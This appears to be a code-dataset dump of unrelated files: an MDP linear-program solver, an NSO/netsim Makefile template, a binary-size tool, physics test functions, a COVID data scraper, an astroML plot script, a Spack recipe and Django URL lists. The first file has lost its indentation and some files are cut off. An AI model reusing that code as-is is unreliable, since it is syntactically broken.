# Leave one line space after each transition table for each action in the data file.
# TransitionFunction For Acti
def autoTransitionFunction(self, gamma=1):
for s in self.states:
s.setTransition([])
stateIndex = 0
actionIndex = 0
with open('transitionData', 'rb') as csvfile:
reader = csv.reader(csvfile, delimiter=',')
for row in reader:
if len(row) == 0:
stateIndex = 0
actionIndex = actionIndex + 1
continue
for sp in xrange(0, self.numberOfStates):
triple = (actionIndex, sp, float(row[sp])*gamma)
self.states[stateIndex].getTransition().append(triple)
stateIndex += 1
# RewardFunctions For Actions
def autoRewardFunction(self):
tosend = []
stateIndex = 0
with open('rewardData', 'rb') as csvfile:
reader = csv.reader(csvfile, delimiter=',')
for row in reader:
if len(row)==0:
continue
for ap in xrange(0, self.numberOfActions):
triple = (ap, float(row[ap]))
tosend.append(triple)
self.states[stateIndex].setReward(tosend)
tosend = []
stateIndex += 1
def generateLPAc(self):
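        # Builds the data for the dual (occupancy-measure) LP: A_mat collects one
        # flow-conservation row per state (out-flow minus discounted in-flow), and R_mat
        # collects the per state-action rewards flattened in the same variable order.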
decisionvar = []
for x in self.states:
triple = []
for y in self.states:
triplet = []
for a in y.possibleActions:
if x.getIndex() == y.getIndex():
triplet.append(float(1))
else:
triplet.append(float(0))
triple.append(triplet)
decisionvar.append(triple)
for x in self.states:
incoming = []
for s in self.states:
for t in s.transition:
if t[1]==x.getIndex() and t[2]!=0:
incoming.append((s, t[0], t[2]))
for h in incoming:
decisionvar[x.getIndex()][h[0].getIndex()][h[1]] -= float(h[2])
for x in decisionvar:
lit = []
for t in x:
lit.extend(t)
A_mat.append(lit)
# for x in self.states:
# for r in x.reward:
# R_mat.append(float(r[1]))
for x in self.states:
for y in x.possibleActions:
for r in x.reward:
if r[0]==y.getIndex():
R_mat.append(r[1])
#print R_mat
# for x in A_mat:
# print x
class Driver:
a = MDP(12, 5)
a.initializeActions()
a.initializeStates()
a.autoTransitionFunction()
a.autoRewardFunction()
a.generateLPAc()
# print a.states[0].transition
def solveLP(beta):
global R_mat, A_mat, alpha, G, h, high_entropy_policy
G = np.add(beta * high_entropy_policy, -1 * np.identity(np.shape(R_mat)[0]))
A = cvxopt.matrix(A_mat)
b = cvxopt.matrix(alpha)
c = cvxopt.matrix(R_mat)
G = cvxopt.matrix(G)
h = cvxopt.matrix(h)
sol = solvers.lp(c, G, h, A, b)
x_mat = np.array(sol['x'])
optimal_solution = np.dot(R_mat.T, x_mat)
return x_mat, -1*optimal_solution[0][0]
def brlp(Emin):
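    # Bisection search over the mixing weight beta in [0, 1]: raise beta_low while the LP's
    # expected reward still exceeds the target Emin, lower beta_high otherwise, and stop once
    # the achieved value is within epsilon of Emin.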
beta_low = 0.0
beta_high = 1.0
beta = (beta_low + beta_high)/2
epsilon = 0.01
x_mat, optimal_solution = solveLP(beta)
while abs(optimal_solution - Emin) > epsilon :
if optimal_solution > Emin:
beta_low = beta
else:
beta_high = beta
beta = (beta_low + beta_high)/2
x_mat, optimal_solution = solveLP(beta)
print("========================================================")
print("Optimal Solution :", optimal_solution)
print("========================================================")
return x_mat
def pre_lpSolver():
global R_mat, A_mat, alpha, G, h, high_entropy_policy
count = 0
high_entropy_policy = np.zeros((len(R_mat), len(R_mat)))
for i in range(len(A_mat)):
if(i == 3 or i == 7):
high_entropy_policy[count][count] = 1.0
count += 1
else:
for j in range(4):
for k in range(4):
high_entropy_policy[count + j][count + k] = 0.25
count += 4
R_mat = -1 * np.array(R_mat)[np.newaxis].T
A_mat = np.array(A_mat)
alpha = np.zeros((np.shape(A_mat)[0], 1))
h = np.zeros((np.shape(R_mat)[0], 1))
alpha[8][0] = 1.0
def calc_entropy(x_mat):
count = 0
policy = np.zeros(np.shape(R_mat)[0])
for i in range(np.shape(A_mat)[0]):
if i == 3 or i == 7:
policy[count] = 1
count += 1
else:
temp = 0
for j in range(4):
temp += x_mat[count + j]
for j in range(4):
policy[count + j] = x_mat[count + j]/temp
count += 4
entropy = 0
print(policy)
for i in range(len(policy)):
entropy += -1 * policy[i] * np.log(policy[i])
print('Using additive entropy matrix, entropy obtained', entropy)
pre_lpSolver()
x_mat = brlp(0.4)
calc_entropy(x_mat)
# R_mat 1x42
# A_mat 12x42
|
StarcoderdataPython
|
3277716
|
MAKEFILE_BASE = """
clean: netsim-clean nso-clean ansible-clean
dev: netsim start-netsim nso dev-sync-to deploy-dev
nso:
-@ncs-setup --dest .
-@echo "Starting local NSO instance..."
-@ncs
ansible-clean:
-@rm *.retry > /dev/null
start-netsim:
-@ncs-netsim start
netsim-clean:
-@echo "Stopping All Netsim Instances..."
-@killall confd
-@rm -Rf netsim/
-@rm README.netsim
nso-clean:
-@echo "Stopping NSO..."
-@ncs --stop
-@rm -Rf README.ncs agentStore state.yml logs/ ncs-cdb/ ncs-java-vm.log ncs-python-vm.log ncs.conf state/ storedstate target/
deploy-dev:
-@ansible-playbook -i inventory/dev.yaml site.yaml
deploy:
-@ansible-playbook -i inventory/prod.yaml site.yaml
dev-sync-to:
-@echo "Performing devices sync-to..."
-@curl -X POST -u admin:admin http://localhost:8080/api/running/devices/_operations/sync-from
sync-to:
-@echo "Performing devices sync-to..."
-@curl -X POST -u admin:admin {base_url}/api/running/devices/_operations/sync-from
sync-from:
-@echo "Performing devices sync-from..."
-@curl -X POST -u admin:admin {base_url}/api/running/devices/_operations/sync-from
"""
|
StarcoderdataPython
|
3287982
|
<filename>Test/astc_size_binary.py
#!/usr/bin/env python3
# SPDX-License-Identifier: Apache-2.0
# -----------------------------------------------------------------------------
# Copyright 2019-2020 Arm Limited
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy
# of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# -----------------------------------------------------------------------------
"""
The ``astc_size_binary`` utility provides a wrapper around the Linux ``size``
utility to view binary section sizes, and optionally compare the section sizes
of two binaries. Section sizes are given for code (``.text``), read-only data
(``.rodata``), and zero initialized data (``.bss``). All other sections are
ignored.
A typical report comparing the size of a new binary against a reference looks
like this:
.. code-block::
Code RO Data ZI Data
Ref 411298 374560 128576
New 560530 89552 31744
Abs D 149232 -285008 -96832
Rel D 36.28% -76.09% -75.31%
"""
import argparse
import shutil
import subprocess as sp
import sys
def run_size(binary):
"""
Run size on a single binary.
Args:
binary (str): The path of the binary file to process.
Returns:
tuple(int, int, int): A triplet of code size, read-only data size, and
zero-init data size, all in bytes.
Raises:
CalledProcessException: The ``size`` subprocess failed for any reason.
"""
args = ["size", "--format=sysv", binary]
result = sp.run(args, stdout=sp.PIPE, stderr=sp.PIPE,
check=True, universal_newlines=True)
data = {}
patterns = {"Code": ".text", "RO": ".rodata", "ZI": ".bss"}
lines = result.stdout.splitlines()
for line in lines:
for key, value in patterns.items():
if line.startswith(value):
size = float(line.split()[1])
data[key] = size
return (data["Code"], data["RO"], data["ZI"])
def parse_command_line():
"""
Parse the command line.
Returns:
Namespace: The parsed command line container.
"""
parser = argparse.ArgumentParser()
parser.add_argument("bin", type=argparse.FileType("r"),
help="The new binary to size")
parser.add_argument("ref", nargs="?", type=argparse.FileType("r"),
help="The reference binary to compare against")
return parser.parse_args()
def main():
"""
The main function.
Returns:
int: The process return code.
"""
args = parse_command_line()
# Preflight - check that size exists. Note that size might still fail at
# runtime later, e.g. if the binary is not of the correct format
path = shutil.which("size")
if not path:
print("ERROR: The 'size' utility is not installed on the PATH")
return 1
# Collect the data
try:
newSize = run_size(args.bin.name)
if args.ref:
refSize = run_size(args.ref.name)
except sp.CalledProcessError as ex:
print("ERROR: The 'size' utility failed")
print(" %s" % ex.stderr.strip())
return 1
# Print the basic table of absolute values
print("%8s % 8s % 8s % 8s" % ("", "Code", "RO Data", "ZI Data"))
if args.ref:
print("%8s % 8u % 8u % 8u" % ("Ref", *refSize))
print("%8s % 8u % 8u % 8u" % ("New", *newSize))
# Print the difference if we have a reference
if args.ref:
diffAbs = []
diffRel = []
for refVal, newVal in zip(refSize, newSize):
diff = newVal - refVal
diffAbs.append(diff)
diffRel.append((diff / refVal) * 100.0)
dat = ("Abs D", diffAbs[0], diffAbs[1], diffAbs[2])
print("%8s % 8u % 8u % 8u" % dat)
dat = ("Rel D", diffRel[0], diffRel[1], diffRel[2])
print("%8s % 7.2f%% % 7.2f%% % 7.2f%%" % dat)
return 0
if __name__ == "__main__":
sys.exit(main())
|
StarcoderdataPython
|
267361
|
<reponame>nilsvu/spectre
# Distributed under the MIT License.
# See LICENSE.txt for details.
import numpy as np
def compute_piecewise(x, rotor_radius, inner_value, outer_value):
radius = np.sqrt(np.square(x[0]) + np.square(x[1]))
if (radius > rotor_radius):
return outer_value
else:
return inner_value
def rest_mass_density(x, rotor_radius, inner_density, outer_density, pressure,
angular_velocity, magnetic_field, adiabatic_index):
return compute_piecewise(x, rotor_radius, inner_density, outer_density)
def spatial_velocity(x, rotor_radius, inner_density, outer_density, pressure,
angular_velocity, magnetic_field, adiabatic_index):
omega = compute_piecewise(x, rotor_radius, angular_velocity, 0.0)
return np.array([-x[1] * omega, x[0] * omega, 0.0])
def specific_internal_energy(x, rotor_radius, inner_density, outer_density,
pressure, angular_velocity, magnetic_field,
adiabatic_index):
return (1.0 / (adiabatic_index - 1.0) * compute_pressure(
x, rotor_radius, inner_density, outer_density, pressure,
angular_velocity, magnetic_field, adiabatic_index) / rest_mass_density(
x, rotor_radius, inner_density, outer_density, pressure,
angular_velocity, magnetic_field, adiabatic_index))
def compute_pressure(x, rotor_radius, inner_density, outer_density, pressure,
angular_velocity, magnetic_field, adiabatic_index):
return pressure
def lorentz_factor(x, rotor_radius, inner_density, outer_density, pressure,
angular_velocity, magnetic_field, adiabatic_index):
v = spatial_velocity(x, rotor_radius, inner_density, outer_density,
pressure, angular_velocity, magnetic_field,
adiabatic_index)
return 1. / np.sqrt(1. - np.dot(v, v))
def specific_enthalpy(x, rotor_radius, inner_density, outer_density, pressure,
angular_velocity, magnetic_field, adiabatic_index):
return (1.0 + adiabatic_index * specific_internal_energy(
x, rotor_radius, inner_density, outer_density, pressure,
angular_velocity, magnetic_field, adiabatic_index))
def magnetic_field(x, rotor_radius, inner_density, outer_density, pressure,
angular_velocity, magnetic_field, adiabatic_index):
return np.array(magnetic_field)
def divergence_cleaning_field(x, rotor_radius, inner_density, outer_density,
pressure, angular_velocity, magnetic_field,
adiabatic_index):
return 0.0
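# Illustrative check (not part of the original test module); the parameter values below are
# placeholder assumptions. The sample point lies at radius 0.05 < rotor_radius, so
# rest_mass_density returns the inner density:
#
#     rest_mass_density(np.array([0.05, 0.0, 0.0]), rotor_radius=0.1, inner_density=10.0,
#                       outer_density=1.0, pressure=1.0, angular_velocity=9.95,
#                       magnetic_field=[1.0, 0.0, 0.0], adiabatic_index=5.0 / 3.0)   # -> 10.0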
|
StarcoderdataPython
|
6402217
|
<filename>code/WV.py
# https://dhhr.wv.gov/COVID-19/Pages/default.aspx
import csv
from datetime import datetime
import json
import os
from urllib.request import urlopen, Request
import requests
from selenium import webdriver
from selenium.webdriver import ActionChains
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.keys import Keys
from bs4 import BeautifulSoup
import time
def run_hist():
# Using Selenium
# driver = webdriver.Safari()
driver = webdriver.Chrome(executable_path="andrew/ChromeDriver/chromedriver.exe")
driver.maximize_window()
driver.get("https://dhhr.wv.gov/COVID-19/Pages/default.aspx")
time.sleep(7)
frame = driver.find_element_by_xpath('//*[@id="responsive"]/iframe')
driver.execute_script("return arguments[0].scrollIntoView(true);", frame)
driver.switch_to.frame(frame)
time.sleep(2)
out = {}
# Click Positive Case Trends
driver.find_element_by_xpath('//*[@id="pvExplorationHost"]/div/div/exploration/div/explore-canvas-modern/div/div[2]/div/div[2]/div[2]/visual-container-repeat/visual-container-modern[17]/transform/div/div[3]/div/visual-modern/div/button').click()
time.sleep(2)
cum_cases_div = driver.find_element_by_xpath('//*[@id="pvExplorationHost"]/div/div/exploration/div/explore-canvas-modern/div/div[2]/div/div[2]/div[2]/visual-container-repeat/visual-container-modern[4]/transform/div/div[3]/div/visual-modern/div')
actionChains = ActionChains(driver)
actionChains.context_click(cum_cases_div).pause(3).send_keys(Keys.ENTER).perform()
time.sleep(2)
# Click Lab Test Trends
# Click Hospital
def get_data(out_county, tables, county_list):
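    # Parses the scraped Power BI table segments: "Table 1" is split into 7 equal columns
    # (county, active, recovered, confirmed, probable, lab tests, deaths), and one dict per
    # county is appended to out_county, skipping counties that were already collected.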
now = str(datetime.now())
for table in tables:
sum_county = 0
for segment in table[0]:
vals = [x.text for x in segment.find_elements_by_xpath('.//*') if '\n' not in x.text]
if table[1] == "Table 1":
if len(vals) % 7 != 0:
raise Exception("Unequal number of columns")
num_counties = len(vals)/7
sum_county += num_counties
cols = []
col = []
count = 0
for val in vals:
count += 1
col.append(val)
if count == num_counties:
count = 0
cols.append(col)
col = []
for col in cols:
if len(col) != num_counties:
raise Exception("Uneven number of values")
for county, active, rec, conf, prob, test, death in zip(cols[0], cols[1], cols[2], cols[3], cols[4], cols[5], cols[6]):
if county in county_list:
continue
ct = {
"County Name": county,
"# Confirmatory Lab Tests": (test).replace(",",""),
"Total Probable Cases": (prob).replace(",",""),
"Total Confirmed Cases": (conf).replace(",",""),
"Total Active Cases": (active).replace(",",""),
"Total Recovered": (rec).replace(",",""),
"Total Deaths: ": (death).replace(",",""),
"Scrape Time": now
}
out_county.append(ct)
county_list.append(county)
# elif table[1] == "Table 2":
# if len(vals) % 4 != 0:
# raise Exception("Unequal number of columns")
# num_counties = len(vals)/4
# sum_county += num_counties
# cols = []
# col = []
# count = 0
# for val in vals:
# count += 1
# col.append(val)
# if count == num_counties:
# count = 0
# cols.append(col)
# col = []
# for col in cols:
# if len(col) != num_counties:
# raise Exception("Uneven number of values")
# for f_cases, f_tests, m_cases, m_tests in zip(cols[0], cols[1], cols[2], cols[3]):
# out_county[idx]["Total Cases: Female"] = f_cases.replace(",","")
# out_county[idx]["Total Confirmatory Tests: Female"] = f_tests.replace(",","")
# out_county[idx]["Total Cases: Male"] = m_cases.replace(",","")
# out_county[idx]["Total Confirmatory Tests: Male"] = m_tests.replace(",","")
# idx += 1
# elif table[1] == "Table 3":
# if len(vals) % 3 != 0:
# raise Exception("Unequal number of columns")
# num_counties = len(vals)/3
# sum_county += num_counties
# cols = []
# col = []
# count = 0
# for val in vals:
# count += 1
# col.append(val)
# if count == num_counties:
# count = 0
# cols.append(col)
# col = []
# for col in cols:
# if len(col) != num_counties:
# raise Exception("Uneven number of values")
# for black, other, white in zip(cols[0], cols[1], cols[2]):
# # out_county[idx]["% Cases Race/Ethnicity: Unknown"] = unk.replace("%","")
# out_county[idx]["% Cases Race/Ethnicity: Black"] = black.replace("%","")
# out_county[idx]["% Cases Race/Ethnicity: Other"] = other.replace("%","")
# out_county[idx]["% Cases Race/Ethnicity: White"] = white.replace("%","")
# out_county[idx]["Scrape Time"] = now
# idx += 1
# if sum_county != 55:
# raise Exception("Unexpected number of counties: " + str(sum_county))
return out_county, county_list
def run_WV(args):
# run_hist()
# exit()
# Parameters
raw_name = '../WV/raw'
data_county = '../WV/data/data_county.csv'
now = str(datetime.now())
# Using Selenium
# driver = webdriver.Safari()
driver = webdriver.Chrome(executable_path="andrew/ChromeDriver/chromedriver.exe")
driver.maximize_window()
driver.get("https://dhhr.wv.gov/COVID-19/Pages/default.aspx")
time.sleep(7)
frame = driver.find_element_by_xpath('//*[@id="responsive"]/iframe')
driver.execute_script("return arguments[0].scrollIntoView(true);", frame)
driver.switch_to.frame(frame)
time.sleep(2)
out_county = []
# Get county data
driver.find_element_by_xpath('//*[@id="pvExplorationHost"]/div/div/exploration/div/explore-canvas-modern/div/div[2]/div/div[2]/div[2]/visual-container-repeat/visual-container-group[9]/transform/div/div[2]/visual-container-modern[2]/transform/div/div[3]/div/visual-modern/div/button').click()
time.sleep(3)
driver.find_element_by_xpath('//*[@id="pvExplorationHost"]/div/div/exploration/div/explore-canvas-modern/div/div[2]/div/div[2]/div[2]/visual-container-repeat/visual-container-modern[11]/transform/div/div[3]/div/visual-modern/div/button').click()
time.sleep(3)
table1_div = (driver.find_elements_by_xpath('//*[@id="pvExplorationHost"]/div/div/exploration/div/explore-canvas-modern/div/div[2]/div/div[2]/div[2]/visual-container-repeat/visual-container-modern[1]/transform/div/div[3]/div/visual-modern/div/div/div[2]/div[1]/div[4]/div/*'), 'Table 1')
# table2_div = (driver.find_elements_by_xpath('//*[@id="pvExplorationHost"]/div/div/exploration/div/explore-canvas-modern/div/div[2]/div/div[2]/div[2]/visual-container-repeat/visual-container-modern[2]/transform/div/div[3]/div/visual-modern/div/div/div[2]/div[1]/div[4]/div/*'), 'Table 2')
# table3_div = (driver.find_elements_by_xpath('//*[@id="pvExplorationHost"]/div/div/exploration/div/explore-canvas-modern/div/div[2]/div/div[2]/div[2]/visual-container-repeat/visual-container-modern[3]/transform/div/div[3]/div/visual-modern/div/div/div[2]/div[1]/div[4]/div/*'), 'Table 3')
# Raw
driver.save_screenshot(raw_name + "/county1_" + now + ".png")
tables = [table1_div]
county_list = []
out_county, county_list = get_data(out_county, tables, county_list)
driver.find_element_by_xpath('//*[@id="pvExplorationHost"]/div/div/exploration/div/explore-canvas-modern/div/div[2]/div/div[2]/div[2]/visual-container-repeat/visual-container-modern[1]/transform/div/div[3]/div/visual-modern/div/div/div[2]/div[1]/div[2]/div/div[1]/div').click()
time.sleep(3)
# Raw
driver.save_screenshot(raw_name + "/county2_" + now + ".png")
table1_div = (driver.find_elements_by_xpath('//*[@id="pvExplorationHost"]/div/div/exploration/div/explore-canvas-modern/div/div[2]/div/div[2]/div[2]/visual-container-repeat/visual-container-modern[1]/transform/div/div[3]/div/visual-modern/div/div/div[2]/div[1]/div[4]/div/*'), 'Table 1')
# table2_div = (driver.find_elements_by_xpath('//*[@id="pvExplorationHost"]/div/div/exploration/div/explore-canvas-modern/div/div[2]/div/div[2]/div[2]/visual-container-repeat/visual-container-modern[2]/transform/div/div[3]/div/visual-modern/div/div/div[2]/div[1]/div[4]/div/*'), 'Table 2')
# table3_div = (driver.find_elements_by_xpath('//*[@id="pvExplorationHost"]/div/div/exploration/div/explore-canvas-modern/div/div[2]/div/div[2]/div[2]/visual-container-repeat/visual-container-modern[3]/transform/div/div[3]/div/visual-modern/div/div/div[2]/div[1]/div[4]/div/*'), 'Table 3')
tables = [table1_div]
out_county, county_list = get_data(out_county, tables, county_list)
if len(county_list) != 55:
raise Exception("Did not collect all counties")
for county in out_county:
fields = sorted([x for x in county])
exists = os.path.exists(data_county)
with open(data_county, "a") as fp:
writer = csv.writer(fp)
if not exists:
writer.writerow(fields)
writer.writerow([county[x] for x in fields])
# # Get Statewide
# out = {}
# driver.find_element_by_xpath('//*[@id="pvExplorationHost"]/div/div/exploration/div/explore-canvas-modern/div/div[2]/div/div[2]/div[2]/visual-container-repeat/visual-container-modern[4]/transform/div/div[3]/div/visual-modern/div/button').click()
# time.sleep(5)
# out["Total Confirmed Cases"] = (driver.find_element_by_xpath('//*[@id="pvExplorationHost"]/div/div/exploration/div/explore-canvas-modern/div/div[2]/div/div[2]/div[2]/visual-container-repeat/visual-container-modern[14]/transform/div/div[3]/div/visual-modern/div/svg/g[1]/text/tspan').text).replace(",","")
# out["Total Probable Cases"] = (driver.find_element_by_xpath('//*[@id="pvExplorationHost"]/div/div/exploration/div/explore-canvas-modern/div/div[2]/div/div[2]/div[2]/visual-container-repeat/visual-container-modern[16]/transform/div/div[3]/div/visual-modern/div/svg/g[1]/text/tspan').text).replace(",","")
# out["Total Deaths"] = (driver.find_element_by_xpath('//*[@id="pvExplorationHost"]/div/div/exploration/div/explore-canvas-modern/div/div[2]/div/div[2]/div[2]/visual-container-repeat/visual-container-modern[35]/transform/div/div[3]/div/visual-modern/div/svg/g[1]/text/tspan').text).replace(",","")
# out["Total Recovered Cases"] = (driver.find_element_by_xpath('//*[@id="pvExplorationHost"]/div/div/exploration/div/explore-canvas-modern/div/div[2]/div/div[2]/div[2]/visual-container-repeat/visual-container-modern[18]/transform/div/div[3]/div/visual-modern/div/svg/g[1]/text/tspan').text).replace(",","")
# out["Total Active Cases"] = (driver.find_element_by_xpath('//*[@id="pvExplorationHost"]/div/div/exploration/div/explore-canvas-modern/div/div[2]/div/div[2]/div[2]/visual-container-repeat/visual-container-modern[19]/transform/div/div[3]/div/visual-modern/div/svg/g[1]/text/tspan').text).replace(",","")
# print(out)
# Get Hospital (Daily confirmed hosp, confirmed icu, confirmed vent)
if __name__ == '__main__':
run_WV({})
|
StarcoderdataPython
|
3550222
|
<filename>ArraysAndSorting/CuttingBoards.py
# Importing standard libraries
import sys
'''
Produces the minimum cost for the cuts. Follows merge sort's merge procedure after
sorting the cost arrays in descending order. As the elements are merged, the corresponding
cut counts (horizontal or vertical) are tracked, and each cut's cost is weighted by the
number of segments the cut passes through.
The algorithm operates with a greedy strategy: most expensive cut first.
Time Complexity : O(M log M + N log N) for the sorts plus O(M + N) for the merge
Note : (A + B) % C = ( A % C + B % C ) % C
'''
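# Worked example (illustrative, not from the original): with mCost = [2] and nCost = [1, 3],
# the greedy order is 3 (say vertical, no horizontal cuts yet -> 3*1), then 2 (horizontal,
# one vertical cut -> 2*2), then 1 (vertical, one horizontal cut -> 1*2),
# for a total of 3 + 4 + 2 = 9, which is the minimum over all cut orders.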
def getMinCost(mCost,nCost):
moduloCon = 1000000000 + 7
mCuts = 0
nCuts = 0
mCost.sort()
mCost.reverse()
nCost.sort()
nCost.reverse()
mCosti = 0
nCosti = 0
totalCost = 0
while( mCosti < len(mCost) and nCosti < len(nCost) ):
if(mCost[mCosti] > nCost[nCosti]):
modInit = totalCost % moduloCon + mCost[mCosti]*(nCuts + 1) % moduloCon
totalCost = ( modInit ) % moduloCon
mCuts += 1
mCosti += 1
else:
modInit = totalCost % moduloCon + nCost[nCosti]*(mCuts + 1) % moduloCon
totalCost = modInit % moduloCon
nCuts += 1
nCosti += 1
while( mCosti < len(mCost) ):
modInit = totalCost % moduloCon + mCost[mCosti]*(nCuts + 1) % moduloCon
totalCost = modInit % moduloCon
mCuts += 1
mCosti += 1
while( nCosti < len(nCost) ):
modInit = totalCost % moduloCon + nCost[nCosti]*(mCuts + 1) % moduloCon
totalCost = modInit % moduloCon
nCuts += 1
nCosti += 1
return totalCost
'''
Main function for the program. Delegates the work to getMinCost.
'''
if __name__ == "__main__":
t = int(sys.stdin.readline().rstrip())
for i in range(t):
[m,n] = [int(x) for x in sys.stdin.readline().rstrip().split()]
mCost = [int(x) for x in sys.stdin.readline().rstrip().split()]
nCost = [int(x) for x in sys.stdin.readline().rstrip().split()]
minCost = getMinCost(mCost,nCost)
print minCost
|
StarcoderdataPython
|
11203834
|
"""
Scematic Diagram of PCA
-----------------------
Figure 7.2
A distribution of points drawn from a bivariate Gaussian and centered on the
origin of x and y. PCA defines a rotation such that the new axes (x' and y')
are aligned along the directions of maximal variance (the principal components)
with zero covariance. This is equivalent to minimizing the square of the
perpendicular distances between the points and the principal components.
"""
# Author: <NAME>
# License: BSD
# The figure produced by this code is published in the textbook
# "Statistics, Data Mining, and Machine Learning in Astronomy" (2013)
# For more information, see http://astroML.github.com
# To report a bug or issue, use the following forum:
# https://groups.google.com/forum/#!forum/astroml-general
import numpy as np
from matplotlib import pyplot as plt
from matplotlib.patches import Ellipse
#----------------------------------------------------------------------
# This function adjusts matplotlib settings for a uniform feel in the textbook.
# Note that with usetex=True, fonts are rendered with LaTeX. This may
# result in an error if LaTeX is not installed on your system. In that case,
# you can set usetex to False.
from astroML.plotting import setup_text_plots
setup_text_plots(fontsize=8, usetex=True)
#------------------------------------------------------------
# Set parameters and draw the random sample
np.random.seed(42)
r = 0.9
sigma1 = 0.25
sigma2 = 0.08
rotation = np.pi / 6
s = np.sin(rotation)
c = np.cos(rotation)
X = np.random.normal(0, [sigma1, sigma2], size=(100, 2)).T
R = np.array([[c, -s],
[s, c]])
X = np.dot(R, X)
#------------------------------------------------------------
# Plot the diagram
fig = plt.figure(figsize=(5, 5), facecolor='w')
ax = plt.axes((0, 0, 1, 1), xticks=[], yticks=[], frameon=False)
# draw axes
ax.annotate(r'$x$', (-r, 0), (r, 0),
ha='center', va='center',
arrowprops=dict(arrowstyle='<->', color='k', lw=1))
ax.annotate(r'$y$', (0, -r), (0, r),
ha='center', va='center',
arrowprops=dict(arrowstyle='<->', color='k', lw=1))
# draw rotated axes
ax.annotate(r'$x^\prime$', (-r * c, -r * s), (r * c, r * s),
ha='center', va='center',
arrowprops=dict(color='k', arrowstyle='<->', lw=1))
ax.annotate(r'$y^\prime$', (r * s, -r * c), (-r * s, r * c),
ha='center', va='center',
arrowprops=dict(color='k', arrowstyle='<->', lw=1))
# scatter points
ax.scatter(X[0], X[1], s=25, lw=0, c='k', zorder=2)
# draw lines
vnorm = np.array([s, -c])
for v in (X.T):
d = np.dot(v, vnorm)
v1 = v - d * vnorm
ax.plot([v[0], v1[0]], [v[1], v1[1]], '-k')
# draw ellipses
for sigma in (1, 2, 3):
ax.add_patch(Ellipse((0, 0), 2 * sigma * sigma1, 2 * sigma * sigma2,
rotation * 180. / np.pi,
ec='k', fc='gray', alpha=0.2, zorder=1))
ax.set_xlim(-1, 1)
ax.set_ylim(-1, 1)
plt.show()
|
StarcoderdataPython
|
4930612
|
# __init__.py for python to treat folder as module
|
StarcoderdataPython
|
21679
|
#!/usr/bin/env python3
'''
The MIT License (MIT)
Copyright (c) 2014 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
def asdata(obj, asdata):
if isinstance(obj, Data):
return obj.asdata(asdata)
elif isinstance(obj, str):
return obj
elif hasattr(obj, '_asdict'):
return asdata(obj._asdict(), asdata)
elif isinstance(obj, dict):
return dict((k, asdata(v, asdata)) for (k, v) in obj.items())
else:
try:
return list(asdata(child, asdata) for child in obj)
except:
return obj
class Data:
def asdata(self, asdata = asdata):
return dict((k, asdata(v, asdata)) for (k, v) in self.__dict__.items())
def __repr__(self):
return self.asdata().__repr__()
|
StarcoderdataPython
|
6626922
|
<gh_stars>1-10
##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by <NAME>, <EMAIL>, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class Openexr(Package):
"""OpenEXR Graphics Tools (high dynamic-range image file format)"""
homepage = "http://www.openexr.com/"
url = "https://savannah.nongnu.org/download/openexr/openexr-2.2.0.tar.gz"
version('2.2.0', 'b64e931c82aa3790329c21418373db4e')
version('2.1.0', '33735d37d2ee01c6d8fbd0df94fb8b43')
version('2.0.1', '4387e6050d2faa65dd5215618ff2ddce')
version('1.7.0', '27113284f7d26a58f853c346e0851d7a')
version('1.6.1', '11951f164f9c872b183df75e66de145a')
version('1.5.0', '55342d2256ab3ae99da16f16b2e12ce9')
version('1.4.0a', 'd0a4b9a930c766fa51561b05fb204afe')
version('1.3.2', '1522fe69135016c52eb88fc7d8514409')
variant('debug', default=False,
description='Builds a debug version of the libraries')
depends_on('pkgconfig', type='build')
depends_on('ilmbase')
def install(self, spec, prefix):
configure_options = ['--prefix={0}'.format(prefix)]
if '+debug' not in spec:
configure_options.append('--disable-debug')
configure(*configure_options)
make('install')
|
StarcoderdataPython
|
3507733
|
webpageTokenUrls = [
('ahj-set-maintainer', {}),
('ahj-remove-maintainer', {}),
('create-api-token', {}),
('edit-review', {}),
('edit-update', {}),
('edit-deletion', {}),
('edit-addition', {}),
('user-update', {}),
('active-user-info', {}),
('comment-submit', {}),
('djoser:user-list', {}),
('djoser-authtoken:login', {}),
('djoser-authtoken:logout', {}),
('confirm-reset-password', {})
]
apiTokenUrls = [
('ahj-public', {}),
('ahj-geo-address', {}),
('ahj-geo-location', {}),
]
noAuthTokenUrls = [
('ahj-private', {}),
('single_ahj', {}),
('edit-list', {}),
('user-edits', {}),
('user-comments', {}),
